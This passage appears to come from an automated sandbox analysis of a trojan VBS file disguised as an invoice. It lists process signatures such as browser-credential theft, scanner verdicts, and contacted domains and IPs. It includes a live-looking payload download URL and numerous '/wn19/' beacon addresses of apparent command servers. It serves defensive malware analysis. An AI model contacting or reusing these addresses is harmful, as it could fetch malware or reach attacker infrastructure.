     46 firefox.exe 1 35->46         started        signatures17 process18 file19 97 Tries to harvest and steal browser information (history, passwords, etc) 43->97 49 conhost.exe 43->49         started        57 C:\Users\user\AppData\...\2LMlogrf.ini, data 46->57 dropped signatures20 process21

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      WWVN_INVOICE_8363567453.vbs24%ReversingLabsScript.Trojan.Valyria
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://barsam.com.au/bin_FCWtLoO90.binzs0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
      https://contoso.com/License0%Avira URL Cloudsafe
      http://www.repaircilinic.com/wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp0%Avira URL Cloudsafe
      http://www.linqxw.com/Accident_Lawyers.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
      http://barsam.com.au/bin_FCWtLoO90.binf0%Avira URL Cloudsafe
      https://outlook.comjU0%Avira URL Cloudsafe
      http://www.borneadomicile.com/wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)0%Avira URL Cloudsafe
      http://www.repaircilinic.com/wn19/0%Avira URL Cloudsafe
      http://barsam.com.au/bin_FCWtLoO90.bink0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe
      http://schemas.micro0%Avira URL Cloudsafe
      http://www.linqxw.com/wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
      http://barsam.com.au/bin_FCWtLoO90.bin0%Avira URL Cloudsafe
      http://barsam.com.au/bin_FCWtLoO90.bin40%Avira URL Cloudsafe
      http://www.schnellekreditfinanz.com/wn19/0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/12471/libgh.png)0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/12471/logo.png)0%Avira URL Cloudsafe
      https://contoso.com/0%Avira URL Cloudsafe
      www.shantelleketodietofficial.site/wn19/0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
      http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRR0%Avira URL Cloudsafe
      http://www.linqxw.com/px.js?ch=10%Avira URL Cloudsafe
      http://www.linqxw.com/px.js?ch=20%Avira URL Cloudsafe
      http://www.linqxw.com/wn19/0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
      http://www.linqxw.com/song_lyrics.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%20%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot0%Avira URL Cloudsafe
      https://www.msn.0%Avira URL Cloudsafe
      http://www.linqxw.com/Healthy_Weight_Loss.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSy0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
      http://www.getsuzamtir.xyz/wn19/0%Avira URL Cloudsafe
      https://go.micro0%Avira URL Cloudsafe
      http://www.clickleaser.com/wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp0%Avira URL Cloudsafe
      http://www.linqxw.com0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)0%Avira URL Cloudsafe
      https://contoso.com/Icon0%Avira URL Cloudsafe
      http://www.clickleaser.com/wn19/0%Avira URL Cloudsafe
      http://www.linqxw.com/find_a_tutor.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%0%Avira URL Cloudsafe
      http://www.linqxw.com/Designer_Apparel.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf0%Avira URL Cloudsafe
      http://www.dujh.xyz/0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf0%Avira URL Cloudsafe
      http://www.dujh.xyz/wn19/?AVnXAh=a63aDXt/KdVd8/vhoA3n5O0XH1EsSnoV0YHdqlzRS6BKHLBCb088tgqJ0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/12471/libg.png)0%Avira URL Cloudsafe
      http://barsam.com.au/bin_FCWtLoO90.binC:0%Avira URL Cloudsafe
      http://www.linqxw.com/Work_from_Home.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff0%Avira URL Cloudsafe
      http://www.linqxw.com/Contact_Lens.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%0%Avira URL Cloudsafe
      http://go.microsoft.c0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff0%Avira URL Cloudsafe
      http://go.microsoft.ce0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
      http://www.linqxw.com/display.cfm0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff20%Avira URL Cloudsafe
      http://barsam.com.au/0%Avira URL Cloudsafe
      http://www.schnellekreditfinanz.com/wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff20%Avira URL Cloudsafe
      https://mozilla.org00%Avira URL Cloudsafe
      http://www.borneadomicile.com/wn19/0%Avira URL Cloudsafe
      http://purlorg/dc/elements/1.1/0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      www.dujh.xyz
      180.76.247.231
      truetrue
        unknown
        www.borneadomicile.com
        217.160.0.18
        truetrue
          unknown
          schnellekreditfinanz.com
          68.65.122.211
          truetrue
            unknown
            www.repaircilinic.com
            185.53.179.171
            truetrue
              unknown
              dual-a-0001.a-msedge.net
              13.107.21.200
              truefalse
                unknown
                www.getsuzamtir.xyz
                199.192.29.215
                truetrue
                  unknown
                  e-0009.e-msedge.net
                  13.107.5.88
                  truefalse
                    unknown
                    barsam.com.au
                    203.170.86.89
                    truetrue
                      unknown
                      www.linqxw.com
                      209.99.40.222
                      truetrue
                        unknown
                        www.clickleaser.com
                        198.23.49.173
                        truetrue
                          unknown
                          www.shantelleketodietofficial.site
                          unknown
                          unknowntrue
                            unknown
                            www.schnellekreditfinanz.com
                            unknown
                            unknowntrue
                              unknown
                              www.tandelawnmaintenance.com
                              unknown
                              unknowntrue
                                unknown
                                www.revboxx.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.actu-infomail.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.thebeautystore.store
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.projectduckling.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.gpusforfun.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.liesdevocalist.store
                                          unknown
                                          unknowntrue
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.repaircilinic.com/wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.borneadomicile.com/wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.repaircilinic.com/wn19/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://barsam.com.au/bin_FCWtLoO90.bintrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.schnellekreditfinanz.com/wn19/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            www.shantelleketodietofficial.site/wn19/true
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.linqxw.com/wn19/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.getsuzamtir.xyz/wn19/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.clickleaser.com/wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.clickleaser.com/wn19/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.schnellekreditfinanz.com/wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.borneadomicile.com/wn19/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000001C.00000000.2244298074.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1907825476.000000000F6D7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://barsam.com.au/bin_FCWtLoO90.binzsieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eotchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://wns.windows.com/ClassIdexplorer.exe, 0000001C.00000000.2205065965.00000000050E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1831648228.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754749899.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243796340.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.linqxw.com/Accident_Lawyers.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otfchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://barsam.com.au/bin_FCWtLoO90.binfieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://outlook.comjUexplorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://excel.office.comexplorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://barsam.com.au/bin_FCWtLoO90.binkieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.microexplorer.exe, 0000001C.00000000.2218425440.000000000A580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715282286.0000000003060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2218349968.000000000A530000.00000002.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.linqxw.com/wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZXchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://i3.cdn-image.com/__media__/pics/12471/arrow.png)chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-reportexplorer.exe, 0000001C.00000000.2207491239.000000000527A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://barsam.com.au/bin_FCWtLoO90.bin4ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://i3.cdn-image.com/__media__/pics/12471/libgh.png)chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://i3.cdn-image.com/__media__/pics/12471/logo.png)chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://contoso.com/powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRRchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.linqxw.com/px.js?ch=1chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.linqxw.com/px.js?ch=2chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://aka.ms/odirm%explorer.exe, 0000001C.00000000.1796519211.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1726283312.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1874472316.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2211492035.00000000095D6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.linqxw.com/song_lyrics.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%2chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eotchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.msn.explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.linqxw.com/Healthy_Weight_Loss.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSychkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://crash-reports.mozilla.com/submit?id=chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://go.micropowershell.exe, 0000000D.00000002.1798789622.0000000005835000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.linqxw.comchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.linqxw.com/find_a_tutor.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.linqxw.com/Designer_Apparel.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttfchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.dujh.xyz/chkdsk.exe, 00000020.00000002.5743432574.0000000008260000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.foreca.comexplorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefixchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otfchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.dujh.xyz/wn19/?AVnXAh=a63aDXt/KdVd8/vhoA3n5O0XH1EsSnoV0YHdqlzRS6BKHLBCb088tgqJchkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743515367.0000000008264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://i3.cdn-image.com/__media__/pics/12471/libg.png)chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://android.notify.windows.com/iOSexplorer.exe, 0000001C.00000000.2230893917.000000000D686000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://barsam.com.au/bin_FCWtLoO90.binC:ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000001C.00000000.2231797627.000000000D823000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.linqxw.com/Work_from_Home.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVlchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woffchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.linqxw.com/Contact_Lens.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://go.microsoft.cpowershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-bchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
